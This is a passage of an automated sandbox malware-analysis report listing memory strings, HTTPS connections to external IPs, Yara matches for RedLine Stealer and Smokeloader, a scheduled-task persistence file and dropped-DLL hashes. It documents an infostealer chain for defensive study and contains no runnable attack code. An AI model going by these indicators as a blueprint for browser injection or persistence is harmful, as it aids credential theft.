Source: firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944FE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B003000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3409063603.000001F94B1EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000002F.00000002.3584635396.000001F945E9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/searchprincipalToInherit_base64__instrumentation_summary
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_ke
Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
Source: fc1511c233.exe, 0000001B.00000003.3316512327.0000000005B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940935000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3468613380.000001F943CC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3468613380.000001F943CC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B5BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/
Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/How
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/mr2022-backgroundtaskmessage-notification-release-
Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000002.2727922118.0000000000C07000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000002F.00000002.3429915034.000000E10C6FC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.comG
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/Z
Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.tsn.caHG
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningWindow_Cc_ontrollersWarningwindow.controllers/Controllers
Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000002F.00000002.3504039978.000001F944303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000002D.00000002.3339715441.0000014A64AC7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3352679269.000001670521A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdL
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F934169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: firefox.exe, 0000002F.00000002.3420008942.000000E104BD8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdPPBd
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://6edd
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://9eee
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account_transitionViews/viewRect
                          Source: unknown | HTTPS traffic detected: 172.67.181.44:443 -> 192.168.2.6:49945 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50002 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50009 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50018 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50024 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50030 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50039 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50054 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50069 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50079 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50082 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50083 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50084 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50085 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50088 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50089 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50090 version: TLS 1.2

                          E-Banking Fraud

                          Source: Yara match | File source: 26.2.e6d73861f4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 26.2.e6d73861f4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 26.2.e6d73861f4.exe.4b30e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 26.3.e6d73861f4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000001A.00000003.3209738665.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000001A.00000002.3419472143.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

                          System Summary

                          Source: 0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f22fd09c-0
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7d2f8800-c
                          Source: file.exe | Static PE information: section name:
                          Source: file.exe | Static PE information: section name: .idata
                          Source: file.exe | Static PE information: section name:
                          Source: random[1].exe.0.dr | Static PE information: section name:
                          Source: random[1].exe.0.dr | Static PE information: section name: .idata
                          Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name:
                          Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name: .idata
                          Source: skotes.exe.21.dr | Static PE information: section name:
                          Source: skotes.exe.21.dr | Static PE information: section name: .idata
                          Source: rhnew[1].exe.22.dr | Static PE information: section name:
                          Source: rhnew[1].exe.22.dr | Static PE information: section name: .idata
                          Source: rhnew[1].exe.22.dr | Static PE information: section name:
                          Source: rhnew.exe.22.dr | Static PE information: section name:
                          Source: rhnew.exe.22.dr | Static PE information: section name: .idata
                          Source: rhnew.exe.22.dr | Static PE information: section name:
                          Source: random[1].exe.22.dr | Static PE information: section name:
                          Source: random[1].exe.22.dr | Static PE information: section name: .idata
                          Source: random[1].exe.22.dr | Static PE information: section name:
                          Source: e6d73861f4.exe.22.dr | Static PE information: section name:
                          Source: e6d73861f4.exe.22.dr | Static PE information: section name: .idata
                          Source: e6d73861f4.exe.22.dr | Static PE information: section name:
                          Source: random[1].exe0.22.dr | Static PE information: section name:
                          Source: random[1].exe0.22.dr | Static PE information: section name: .idata
                          Source: random[1].exe0.22.dr | Static PE information: section name:
                          Source: fc1511c233.exe.22.dr | Static PE information: section name:
                          Source: fc1511c233.exe.22.dr | Static PE information: section name: .idata
                          Source: fc1511c233.exe.22.dr | Static PE information: section name:
                          Source: random[2].exe.22.dr | Static PE information: section name:
                          Source: random[2].exe.22.dr | Static PE information: section name: .idata
                          Source: random[2].exe.22.dr | Static PE information: section name:
                          Source: 6ae2430bb1.exe.22.dr | Static PE information: section name:
                          Source: 6ae2430bb1.exe.22.dr | Static PE information: section name: .idata
                          Source: 6ae2430bb1.exe.22.dr | Static PE information: section name:
                          Source: random[2].exe0.22.dr | Static PE information: section name:
                          Source: random[2].exe0.22.dr | Static PE information: section name: .idata
                          Source: f9882ce6c1.exe.22.dr | Static PE information: section name:
                          Source: f9882ce6c1.exe.22.dr | Static PE information: section name: .idata
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C9DB700
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9DB8C0 rand_s,NtQueryVirtualMemory,0_2_6C9DB8C0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C9DB910
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C97F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C97F280
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_0089CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,22_2_0089CB97
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | File created: C:\Windows\Tasks\skotes.job
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6E0700_2_6CA6E070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA201E00_2_6CA201E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB041300_2_6CB04130
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA961300_2_6CA96130
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA881400_2_6CA88140
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAF22A00_2_6CAF22A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEE2B00_2_6CAEE2B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBA62C00_2_6CBA62C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAF82200_2_6CAF8220
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAEA2100_2_6CAEA210
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA82600_2_6CAA8260
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB82500_2_6CAB8250
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA523A00_2_6CA523A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7E3B00_2_6CA7E3B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA743E00_2_6CA743E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA923200_2_6CA92320
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB623700_2_6CB62370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA223700_2_6CA22370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB3C3600_2_6CB3C360
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB63700_2_6CAB6370
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00ED5C83
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00ED735A
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00F18860
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00ED4DE0
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00ED4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_0088E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008A6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_00884B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_00884DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008A0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_00989680
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008A1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008A3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008B7F36
Source: Joe Sandbox View | Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View | Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 0089D942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 0089D663 appears 38 times
